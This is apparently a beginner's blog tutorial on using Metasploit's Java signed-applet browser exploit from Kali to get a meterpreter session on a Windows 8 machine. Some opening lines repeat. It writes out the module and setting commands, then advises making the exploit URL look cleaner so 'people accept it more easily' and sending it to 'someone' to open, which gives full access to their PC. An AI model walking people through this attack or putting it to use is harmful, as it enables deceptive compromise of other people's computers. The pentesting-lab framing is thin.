Hello guys,
Today I have my first Metasploit tutorial! We will be pentesting Windows 8 (My PC) Using Metasploit on Kali, inside a virtual machine.
So lets get started!
First thing you need to do is open Metasploit by running "msfconsole" in your terminal.
After metasploit loads, type this command:
Like the picture bellow:
Today I have my first Metasploit tutorial! We will be pentesting Windows 8 (My PC) Using Metasploit on Kali, inside a virtual machine.
So lets get started!
First thing you need to do is open Metasploit by running "msfconsole" in your terminal.
After metasploit loads, type this command:
use multi/browser/java_signed_applet
Like the picture bellow:
Now You have to set you local port, in this exploit its called SRVPORT. The default port is 8080, you can set it to any port you want.
Just run the command bellow:
set SRVPORT [Port number]
Change [Port number to anything you like, I used 1337.
Now to change the path to the exploit, we can set the URIPATH to anything we want.
We can leave all the settings as it is, but it will look a little bit ugly, things like:
0.0.0.0:8080/Kgn3Tn
Changing them will make people accept it more easily, and it's more fun!
To change the URIPATH run the following command:
set URIPATH /
Like the picture bellow:
Now run the command "exploit"
All you have to do now, is send the IP to someone to open. When they open it they'll see a screen like this:
If they ran it, a window will open, Check "I accept the risk and want to run this application" then click on "Run"
As soon as you run it, metasploit will start a meterpreter session to the target PC, and you'll have full access to the target PC!
Session Opened:
System info:
Hope you like it!
Here is the video tutorial, performing this attack!
Video available in HD, just change the quality! Vimeo Link: https://vimeo.com/64841698
